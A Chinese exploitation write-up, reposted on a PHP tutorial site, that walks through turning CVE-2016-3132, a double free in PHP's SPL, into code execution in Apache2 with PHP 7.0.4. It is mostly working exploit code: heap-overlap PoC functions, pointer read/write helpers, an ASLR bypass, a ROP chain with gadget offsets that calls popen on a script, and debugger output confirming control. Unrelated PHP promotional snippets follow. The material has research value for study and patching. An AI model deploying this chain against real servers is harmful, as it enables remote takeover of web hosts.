How to Exploit libphp7.0.so in Apache2-php教程-PHP中文网

首页

后端开发

php教程

How to Exploit libphp7.0.so in Apache2

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 23, 2016 pm 01:06 PM

0x00 简介

之前有外国牛人发部blog Double Free in Standard PHP Library Double Link List [CVE-2016-3132]

其文章详述了漏洞成因

#!php<?php$var_1=new SplStack();$var_1->offsetSet(100,new DateTime('2000-01-01')); //DateTime will be double-freed

SplDoublyLinkedList::offsetSet ( mixed $index , mixed $newval ) 失败的话，对象就会被free两次。略过细节，这种漏洞想继续利用，必须要翻看php源码对于heap的管理套路了。

所需要知道的是，问题对象 SplFixedArray 的尺寸让它存在于php自己维护的一个freelist里面。如果一块内存的引用计数消耗光，php简单地把freelist的next指针指向这块内存，这样就结束了。如果发生了double free，php里面的freelist会变成这样：

就是说当下两次内存申请的时候，两个对象就会重叠

可以上套路了，重叠字符串类型，修改长度，越界读写。

#!cpptypedef struct _spl_fixedarray_object { /* {{{ */    struct _zend_string {    spl_fixedarray        *array;                        zend_refcounted_h gc;    zend_function         *fptr_offset_get;              zend_ulong        h; /* hash value */    zend_function         *fptr_offset_set;              size_t            len;    zend_function         *fptr_offset_has;              char              val[1];    zend_function         *fptr_offset_del;              };    zend_function         *fptr_count;    int                    current;    int                    flags;    zend_class_entry      *ce_get_iterator;    zend_object            std;} spl_fixedarray_object;/* }}} */

当然，精心的内存布局还是需要的，比如连续申请大量内存什么的，保证要操作的区域干净、连续

最后理想的情况就是这样啦，被改掉长度的字符串后面是整齐排列的 SplFixedArray

能做的事情有：

越界读后面堆块指针，获取其真实地址，和与数组游标的对应关系
越界写后面对象的函数指针，指向前面获取的地址，即数组的地址

向数组填入内容，这样劫持了$rip

文章写到这里就结束了，poc给到0xdeadbeef

#!phpfunction exception_handler($exception) {global $z;$s=str_repeat('C',0x48);$t=new SplFixedArray2(5);$t[0]='Z';unset($z[22]);unset($z[21]);$heap_addr=read_ptr($s,0x58);print "Leak Heap memory location: 0x" . dechex($heap_addr) . "\n"; $heap_addr_of_fake_handler=$heap_addr-0x70-0x70+0x18+0x300;print "Heap address of fake handler 0x" . dechex($heap_addr_of_fake_handler) . "\n";//Set Handlerswrite_ptr($s,$heap_addr_of_fake_handler,0x40);//Set fake handlerwrite_ptr($s,0x40,0x300); //handler.offsetwrite_ptr($s,0x4141414141414141,0x308); //handler.free_objwrite_ptr($s,0xdeadbeef,0x310); //handler.dtor.objstr_repeat('z',5);unset($t);  //BOOM!}

0x01 实际测试

演示只是演示，没实际意义，在真实的生产环境中，这个洞有没有可能成功利用呢

在此，[email protected]

，真的非常好用！

Apache/2.4.18
php 7.0.4

在apache里面php是和libc一样被当做.so来加载的，所以全套保护都上齐全了

CANARY : ENABLED
FORTIFY : ENABLED
NX : ENABLED
PIE : ENABLED
RELRO : FULL

不要慌，我们还有更深的套路

刚才那个长度超长的数组对象，除了可以越界读堆块的地址，还可以越界读对象的 函数指针列表地址

这个地址在同一个bin文件里的地址是相对固定的，地址随机化就这么过掉了。

#!php$push_rax=0x000000000033a9f3+$aslr_offset;// push rax; stc; jmp qword ptr [rax + 0x36];$pop_rsp=0x00000000000d3923+$aslr_offset;//pop rsp; pop r13; ret;$sub_rsp=0x0000000000106abe+$aslr_offset;// sub rsp, -0x80; pop rbx; ret;$pop_rsi=0x00000000000094e8+$aslr_offset;// pop rsi; ret;$pop_rdi=0x00000000000d3b2f+$aslr_offset;// pop rdi; ret;$pop_rbp=0x00000000000d3925+$aslr_offset;// pop rbp; ret;$p_popen=0x00000000000d2580+$aslr_offset;//popen//Set Handlerswrite_ptr($s,$heap_addr_of_fake_handler,0x40);//Set fake handlerwrite_ptr($s,$aslr_offset,0x300);//heap_addr_of_fake_handler and [rax] is here!write_ptr($s,0x4141414141414141,0x300+0x48);write_ptr($s,0x0000000000000072,0x300+0x50);//"r"write_ptr($s,0x732e612f706d742f,0x300+0x58);//"/tmp/a.sh"write_ptr($s,0x0000000000000068,0x300+0x60);write_ptr($s,$push_rax,0x300+0x10);write_ptr($s,$pop_rsp,0x300+0x36);write_ptr($s,$sub_rsp,0x300+0x8);//now,rsp=rax+0x98write_ptr($s,$pop_rsp,0x300+0x98);write_ptr($s,$heap_addr_of_fake_handler-0x100,0x300+0xa0);//now,rsp=rax-0xf0write_ptr($s,$pop_rsi,0x300-0xf8);write_ptr($s,$heap_addr_of_fake_handler+0x50,0x300-0xf0);write_ptr($s,$pop_rdi,0x300-0xe8);write_ptr($s,$heap_addr_of_fake_handler+0x58,0x300-0xe0);write_ptr($s,$pop_rbp,0x300-0xd8);write_ptr($s,$heap_addr_of_fake_handler-0xb8,0x300-0xd0);//now rsp=rax-0xc0,rbp=rax-0xb8write_ptr($s,$p_popen,0x300-0xc8);

很乱的rop里该有的都有了，包括把栈帧指向刚才操作好的内存堆，方便行事。

#!bash[----------------------------------registers-----------------------------------]RAX: 0x7fc6edc6ebd8 --> 0x7fc6f218a000 --> 0x10102464c457fRBX: 0x0RCX: 0x16RDX: 0xc4f352ef5bf0be4aRSI: 0x7fc6edc6ec28 --> 0x72 ('r')RDI: 0x7fc6edc6ec30 ("/tmp/a.sh")RBP: 0x7fc6edc6eb20 --> 0x0RSP: 0x7fc6edc6eb18 --> 0x0RIP: 0x7fc6f52fa540 (<_IO_new_popen>:   push   r12)R8 : 0x20 (' ')R9 : 0x0R10: 0x2R11: 0x38 ('8')R12: 0x7fc6f2798c1c --> 0x0R13: 0x7fc6f27ae8c0 --> 0x40 ('@')R14: 0x7fc6edc12030 --> 0x7fc6e7458f70 --> 0x7fc6f2451a00 (push   r12)R15: 0x7fc6e7458f70 --> 0x7fc6f2451a00 (push   r12)EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)[-------------------------------------code-------------------------------------]   0x7fc6f52fa530 <_IO_new_proc_open+848>:  jmp    0x7fc6f52fa4da <_IO_new_proc_open+762>   0x7fc6f52fa532:  nop    DWORD PTR [rax+0x0]   0x7fc6f52fa536:  nop    WORD PTR cs:[rax+rax*1+0x0]=> 0x7fc6f52fa540 <_IO_new_popen>:  push   r12   0x7fc6f52fa542 <_IO_new_popen+2>:    push   rbp   0x7fc6f52fa543 <_IO_new_popen+3>:    mov    rbp,rdi   0x7fc6f52fa546 <_IO_new_popen+6>:    push   rbx   0x7fc6f52fa547 <_IO_new_popen+7>:    mov    edi,0x100[------------------------------------stack-------------------------------------]0000| 0x7fc6edc6eb18 --> 0x00008| 0x7fc6edc6eb20 --> 0x00016| 0x7fc6edc6eb28 --> 0x00024| 0x7fc6edc6eb30 --> 0xc01a0008000000010032| 0x7fc6edc6eb38 --> 0x1b0040| 0x7fc6edc6eb40 --> 0x56478a526ed0 --> 0x10048| 0x7fc6edc6eb48 --> 0x7fc6f27ae8c0 --> 0x40 ('@')0056| 0x7fc6edc6eb50 --> 0x0[------------------------------------------------------------------------------]Legend: code, data, rodata, valueThread 2.1 "apache2" hit Breakpoint 1, _IO_new_popen (command=0x7fc6edc6ec30 "/tmp/a.sh", mode=0x7fc6edc6ec28 "r") at iopopen.c:273

别忘了$rsp和$rbp都需要设置好，不然popen不会执行成功的。

最后，有两点要说明一下：

原文poc提供的 read_ptr 有问题，读地址的时候会中间丢掉0

感谢phithon与毕月乌大牛提供正确版本的函数

#!phpfunction read_ptr(&$mystring,$index=0,$little_endian=1){    $s = "";    for($i = 1; $i <= 8; $i++) {        $s .= str_pad(dechex(ord($mystring[$index+(8-$i)])), 2, '0', STR_PAD_LEFT);    }    return hexdec($s);}

另外就是，采用popen这个函数来完成最后的shellcode动作，是因为这个函数在libphp.so的plt里面提供了地址。如果要用system的话，还要到libc里面去找，多算一个模块的地址，就多了一份麻烦和不稳定。

尽管本文成功绕过所有保护成功执行shellcode，但是实际意义依然有限，因为phplib.so的版本太多啦，很多情况下都是自家编译出来的，不同的so文件function table的相对位置会不一样，这样计算的基质会出错，当然构造的rop也全都错了。

php版本多，glibc版本少啊，用glibc做rop啊！用glibc找system函数啊！

除非上面那个被改了长度的数组可以越界读到一个glibc里面的地址，否则怎样都还是需要依靠libphp.so的。

以上です。

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

PHP：服务器端脚本语言的简介Apr 16, 2025 am 12:18 AM

PHP是一种服务器端脚本语言，用于动态网页开发和服务器端应用程序。1.PHP是一种解释型语言，无需编译，适合快速开发。2.PHP代码嵌入HTML中，易于网页开发。3.PHP处理服务器端逻辑，生成HTML输出，支持用户交互和数据处理。4.PHP可与数据库交互，处理表单提交，执行服务器端任务。

PHP和网络：探索其长期影响Apr 16, 2025 am 12:17 AM

PHP在过去几十年中塑造了网络，并将继续在Web开发中扮演重要角色。1)PHP起源于1994年，因其易用性和与MySQL的无缝集成成为开发者首选。2)其核心功能包括生成动态内容和与数据库的集成，使得网站能够实时更新和个性化展示。3)PHP的广泛应用和生态系统推动了其长期影响，但也面临版本更新和安全性挑战。4)近年来的性能改进，如PHP7的发布，使其能与现代语言竞争。5)未来，PHP需应对容器化、微服务等新挑战，但其灵活性和活跃社区使其具备适应能力。

为什么要使用PHP？解释的优点和好处Apr 16, 2025 am 12:16 AM

PHP的核心优势包括易于学习、强大的web开发支持、丰富的库和框架、高性能和可扩展性、跨平台兼容性以及成本效益高。1)易于学习和使用，适合初学者；2)与web服务器集成好，支持多种数据库；3)拥有如Laravel等强大框架；4)通过优化可实现高性能；5)支持多种操作系统；6)开源，降低开发成本。

揭穿神话：PHP真的是一种死语吗？Apr 16, 2025 am 12:15 AM

PHP没有死。1)PHP社区积极解决性能和安全问题，PHP7.x提升了性能。2)PHP适合现代Web开发，广泛用于大型网站。3)PHP易学且服务器表现出色，但类型系统不如静态语言严格。4)PHP在内容管理和电商领域仍重要，生态系统不断进化。5)通过OPcache和APC等优化性能，使用OOP和设计模式提升代码质量。

PHP与Python辩论：哪个更好？Apr 16, 2025 am 12:03 AM

PHP和Python各有优劣，选择取决于项目需求。1)PHP适合Web开发，易学，社区资源丰富，但语法不够现代，性能和安全性需注意。2)Python适用于数据科学和机器学习，语法简洁，易学，但执行速度和内存管理有瓶颈。

PHP的目的：构建动态网站Apr 15, 2025 am 12:18 AM

PHP用于构建动态网站，其核心功能包括：1.生成动态内容，通过与数据库对接实时生成网页；2.处理用户交互和表单提交，验证输入并响应操作；3.管理会话和用户认证，提供个性化体验；4.优化性能和遵循最佳实践，提升网站效率和安全性。

PHP：处理数据库和服务器端逻辑Apr 15, 2025 am 12:15 AM

PHP在数据库操作和服务器端逻辑处理中使用MySQLi和PDO扩展进行数据库交互，并通过会话管理等功能处理服务器端逻辑。1）使用MySQLi或PDO连接数据库，执行SQL查询。2）通过会话管理等功能处理HTTP请求和用户状态。3）使用事务确保数据库操作的原子性。4）防止SQL注入，使用异常处理和关闭连接来调试。5）通过索引和缓存优化性能，编写可读性高的代码并进行错误处理。